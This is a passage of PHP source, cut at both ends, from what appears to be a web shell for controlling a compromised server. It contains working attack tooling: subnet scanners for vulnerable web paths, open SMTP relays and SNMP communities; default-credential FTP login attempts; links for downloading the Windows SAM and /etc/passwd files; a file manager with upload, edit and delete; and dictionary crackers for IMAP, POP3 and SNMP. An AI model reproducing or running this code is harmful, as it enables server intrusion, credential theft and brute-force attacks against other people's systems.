elseif(strstr($page,'@ADMINDIRS')) foreach ($admin as $cg){ $adminch=str_replace('@ADMINDIRS',$cg,$page); $url="http://$ip$adminch"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} flusheR(); } elseif(strstr($page,'@USERS')) foreach ($users as $cg){ $userch=str_replace('@USERS',$cg,$page); $url="http://$ip$userch"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} flusheR(); } elseif(strstr($page,'@NUKE')) foreach ($nuke as $cg){ $nukech=str_replace('@NUKE',$cg,$page); $url="http://$ip$nukech"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} flusheR(); } else{ $url="http://$ip$page"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} flusheR(); } } } } if(!empty($_REQUEST['smtprelay'])){ if(checkthisporT($ip,25,$timeout)){ $res=''; $res=checksmtP($ip,$timeout); if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR(); } } if(!empty($_REQUEST['snmpscanner'])){ if(checkthisporT($ip,161,$timeout,1)){ $com=$_REQUEST['com']; $coms=$res=""; if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com; foreach ($c as $v){ $ret=snmpchecK($ip,$v,$timeout); if($ret)$coms .=" $v "; } if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;} flusheR(); } } if(!empty($_REQUEST['ftpscanner'])){ if(checkthisporT($ip,21,$timeout)){ $usps=explode(',',$_REQUEST['userpass']); foreach ($usps as $v){ $user=substr($v,0,strpos($v,':')); $pass=substr($v,strpos($v,':')+1); if($pass=='[BLANK]')$pass=''; $ftp=@ftp_connect($ip,21,$timeout); if ($ftp){ if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";} } flusheR(); } } } if($output)echo "<hr size=1 noshade>"; flusheR(); } $time=time()-$start; echo "Done! ($time seconds)</font>"; if(!empty($buglist))unlink($buglist); } else{ $chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>"; echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>"; $host = substr($host,0,strrpos($host,".")); echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning <input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>"; } } function sysinfO(){ global $windows,$disablefunctions,$safemode; $cwd= getcwd(); $mil="<a target=\"_blank\" href=\"http://www.milw0rm.org/related.php?program="; $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"]; $osver=$tsize=$fsize=''; if ($windows){ $osver = " (".shelL("ver").")"; $sysroot = shelL("echo %systemroot%"); if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"]; if (empty($sysroot)) $sysroot = getenv("windir"); if (empty($sysroot)) $sysroot = "Not Found"; if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%"); for ($i=66;$i<=90;$i++){ $drive= chr($i).':\\'; if (is_dir($drive)){ $fsize+=@disk_free_space($drive); $tsize+=@disk_total_space($drive); } } }else{ $fsize=disk_free_space('/'); $tsize=disk_total_space('/'); } $disksize="Used spase: ". showsizE($tsize-$fsize) . " Free space: ". showsizE($fsize) . " Total space: ". showsizE($tsize); if (empty($CPU)) $CPU = "Unknow"; $os = php_unamE(); $osn=php_unamE('s'); if(!$windows){ $ker = php_unamE('r'); $o=($osn=="Linux")?"Linux+Kernel":$osn; $os = str_replace($osn,"${mil}$o\">$osn</a>",$os); $os = str_replace($ker,"${mil}Linux+Kernel\">$ker</a>",$os); $inpa=':'; }else{ $sam = $sysroot."\\system32\\config\\SAM"; $inpa=';'; $os = str_replace($osn,"${mil}MS+Windows\">$osn</a>",$os); } $software=str_replace("Apache","${mil}Apache\">Apache</a>",$_SERVER['SERVER_SOFTWARE']); echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td>Server information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Operation system:</td><td bgcolor=\"#808080\">$os$osver</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Web server application:</td><td bgcolor=\"#666666\">$software</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">CPU:</td><td bgcolor=\"#808080\">$CPU</td></tr><td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">User domain:</td><td bgcolor=\"#808080\">";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">User name:</td><td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "</td></tr>"; if ($windows){ echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Windows directory:</td><td bgcolor=\"#808080\"><a href=\"".hlinK("seC=fm&workingdiR=$sysroot")."\">$sysroot</a></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">Readable</a>"; else echo "Not readable";echo "</td></tr>"; } else { echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Passwd file:</td><td bgcolor=\"#808080\">"; if (is_readable('/etc/passwd')) echo "<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">"; if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\">Readable</a>"; else echo "Not readable";}else echo "Not found"; echo "</td></tr>"; } $uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR'); echo "<tr><td width=\"25%\" bgcolor=\"#808080\">${mil}PHP\">PHP</a> version:</td><td bgcolor=\"#808080\"><a href=\"?=".php_logo_guid()."\" target=\"_blank\">".PHP_VERSION."</a> (<a href=\"".hlinK("seC=phpinfo&workingdiR=$cwd")."\">more...</a>)</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td><td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\">".zend_version()."</a>";else echo "Not Found";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Include path:</td><td bgcolor=\"#808080\">".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td><tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td><td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Disabled functions:</td><td bgcolor=\"#808080\">";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$safemode</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Open base dir:</td><td bgcolor=\"#808080\">$basedir</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td><td bgcolor=\"#666666\">";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle</a> ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" bgcolor=\"#808080\">cURL support:</td><td bgcolor=\"#808080\">Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "<tr><td>User information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">$uip</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Agent:</td><td bgcolor=\"#808080\">".getenv('HTTP_USER_AGENT')."</td></tr></table>"; } function checksuM($file){ global $et; echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td width=\"10%\" bgcolor=\"#666666\"><b>MD5:</b> <font color=#F0F0F0>".md5_file($file)."</font><br><b>SHA1:</b> <font color=#F0F0F0>".sha1_file($file)."</font>$et"; } function listdiR($cwd,$task){ $c= getcwd(); $dh = opendir($cwd); while ($cont=readdir($dh)){ if($cont=='.' || $cont=='..')continue; $adr = $cwd.DIRECTORY_SEPARATOR.$cont; switch ($task){ case '0':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; case '1':if(is_writeable($adr))if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; case '2':if(is_file($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break; case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; case '4':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break; case '5':if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break; case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break; } if (is_dir($adr)) listdiR($adr,$_REQUEST['task']); } } if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}} if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}} function filemanager(){ global $windows,$msgbox,$errorbox,$t,$et,$hcwd; $cwd= getcwd(); $table = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\">"; $td1n="<td width=\"22%\" bgcolor=\"#666666\">"; $td2m="<td width=\"22%\" bgcolor=\"#808080\">"; $td1i="<td width=\"5%\" bgcolor=\"#666666\">"; $td2i="<td width=\"5%\" bgcolor=\"#808080\">"; $tdnr="<td width=\"22%\" bgcolor=\"#800000\">"; $tdw="<td width=\"22%\" bgcolor=\"#006E00\">"; if (!empty($_REQUEST['task'])){ if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7; if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6; echo "<font color=blue><pre>"; listdiR($cwd,$_REQUEST['task']); echo "</pre></font>"; }else{ if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){ if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){ $title="Destination"; $ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV']; $dis =(!empty($_REQUEST['cP']))?'Copy':'Move'; }else{ $ad = $_REQUEST['rN']; $title ="New name"; $dis = "Rename"; } if (!!empty($_REQUEST['deS'])){ echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"100%\" bgcolor=\"#333333\">$title:</td></tr><tr>$td1n<form method=\"POST\"><input type=text value=\"";if(empty($_REQUEST['rN'])) echo $cwd; echo "\" size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value=\"".htmlspecialchars($ad)."\" name=cp><input class=buttons type=submit value=$dis></td></tr></form></table></center>"; }else{ if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']); else{ copy($ad,$_REQUEST['deS']); if (!empty($_REQUEST['mV']))unlink($ad); } } } if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) { $dh = opendir($_REQUEST['deL']); $d=""; while ($cont=readdir($dh)){$d++;} if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!<td><tr></table><br>";else rmdir($_REQUEST['del']);}} if (!empty($_FILES['uploadfile'])){ move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']); echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>"; } $select = "<select onChange=\"window.location=this.options[this.selectedIndex].value;\"><option value=\"".hlinK("seC=fm&workingdiR=$cwd")."\">--------</option><option value=\""; if (!empty($_REQUEST['newf'])){ if (!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],"");} if (!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);} } if ($windows){ echo "$table<td><b>Drives:</b> "; for ($i=66;$i<=90;$i++){$drive= chr($i).':'; if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$vol\" href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";} } echo $et; } echo "$table<form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=135 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table>"; $file=array();$dir=array();$link=array(); if($dirhandle = opendir($cwd)){ while ($cont=readdir($dirhandle)){ if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont; elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont; else $link[]=$cont; } closedir($dirhandle); sort($file);sort($dir);sort($link); echo "<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td width=\"30%\" bgcolor=\"#333333\" align=\"center\">Name</td><td width=\"13%\" bgcolor=\"#333333\" align=\"center\">Owner</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Modification time</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Last change</td><td width=\"5%\" bgcolor=\"#333333\" align=\"center\">Info</td><td width=\"7%\" bgcolor=\"#333333\" align=\"center\">Size</td><td width=\"15%\" bgcolor=\"#333333\" align=\"center\">Actions</td></tr>"; $i=0; foreach($dir as $dn){ echo "<tr>"; $i++; $own="Unknow"; $owner=posix_getpwuid(fileowner($dn)); $mdate=date("Y/m/d H:i:s",filemtime($dn)); $adate=date("Y/m/d H:i:s",fileatime($dn)); $diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."\">Remove</option></select></td>"; if ($owner) $own = "<a title=\" Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2; echo "<a href=\"".hlinK("seC=fm&workingdiR=".realpath($dn))."\">"; if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo "</a>"; echo $cl1."$own</td>"; echo $cl1."$mdate</td>"; echo $cl1."$adate</td>"; echo "</td>${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo "</td>"; echo "$cl1------</td>"; echo $cl2.$diraction; echo "</tr>" ; flusheR(); } foreach($file as $fn){ echo "<tr>"; $i++; $own = "Unknow"; $owner = posix_getpwuid(fileowner($fn)); $fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$fn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."\">Remove</option></select></td>"; $mdate = date("Y/m/d H:i:s",filemtime($fn)); $adate = date("Y/m/d H:i:s",fileatime($fn)); if ($owner) $own = "<a title=\"Shell:".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; $size = showsizE(filesize($fn)); if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2; echo "<a href=\"".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">"; if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo "</a>"; echo $cl1."$own</td>"; echo $cl1."$mdate</td>"; echo $cl1."$adate</td>"; echo "</td>$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo "</td>"; echo "$cl1$size</td>"; echo $td2m.$fileaction; echo "</tr>" ; flusheR(); } foreach($link as $ln){ $own = "Unknow"; $i++; $owner = posix_getpwuid(fileowner($ln)); $linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."\">Remove</option></select></td>"; $mdate = date("Y/m/d H:i:s",filemtime($ln)); $adate = date("Y/m/d H:i:s",fileatime($ln)); if ($owner) $own = "<a title=\"Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; echo "<tr>"; $size = showsizE(filesize($ln)); if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2; echo "<a href=\"".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."\">"; if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo "</a>"; echo $cl1."$own</td>"; echo $cl1."$mdate</td>"; echo $cl1."$adate</td>"; echo "</td>${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo "</td>"; echo "$cl1$size</td>"; echo $cl2.$linkaction; echo "</tr>" ; flusheR(); } } $dc = count($dir)-2; if($dc==-2)$dc=0; $fc = count($file); $lc = count($link); $total = $dc + $fc + $lc; echo "$table<tr><td><form method=POST>Find:<input type=text name=search><input type=checkbox name=re value=1 style=\"border-width:1px;background-color:#333333;\" checked>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value=\"fm\" name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width=\"100%\"><tr><td width=\"50%\"><br><table bgcolor=#333333 border=0 width=\"65%\"><td><b>Summery:</b> Total: $total Directories: $dc Files: $fc Links: $lc</td></table><table bgcolor=#333333 border=0 width=\"65%\"><td width=\"100%\" bgcolor=";if (is_writeable($cwd)) echo "#006E00";elseif (!is_readable($cwd)) echo "#800000";else "#333333"; echo ">Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "</td></table><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"65%\"><tr><td width=\"100%\" bgcolor=\"#333333\">New:</td></tr><tr>$td1n<form method=\"POST\"><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value=\"File\"><input class=buttons type=submit name=newdir value=\"Folder\"></td></tr></form></table></td><td width=\"50%\"><br>${t}Upload:</td></tr><tr>$td1n<form method=\"POST\" enctype=\"multipart/form-data\"><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')."</td></tr></form></table>$et"; } } function imaplogiN($host,$username,$password){ $sock=fsockopen($host,143,$n,$s,5); $b=namE(); $l=strlen($b); if(!$sock)return -1; fread($sock,1024); fputs($sock,"$b LOGIN $username $password\r\n"); $res=fgets($sock,$l+4); if ($res == "$b OK")return 1;else return 0; fclose($sock); } function pop3logiN($server,$user,$pass){ $sock=fsockopen($server,110,$en,$es,5); if(!$sock)return -1; fread($sock,1024); fwrite($sock,"user $user\n"); $r=fgets($sock); if($r{0}=='-')return 0; fwrite($sock,"pass $pass\n"); $r=fgets($sock); fclose($sock); if($r{0}=='+')return 1; return 0; } function imapcrackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $imap=imaplogiN($target,$user,$pass); if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{ if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}} flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "<center>${t}IMAP cracker:$crack"; } function snmpcrackeR(){ global $t,$et,$errorbox,$crack,$hcwd; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); while(!feof($dictionary)){ $com=trim(fgets($dictionary)," \n\r"); $res=snmpchecK($target,$com,2); if($res)echo "$com<br>"; flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "<center>${t}SNMP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td 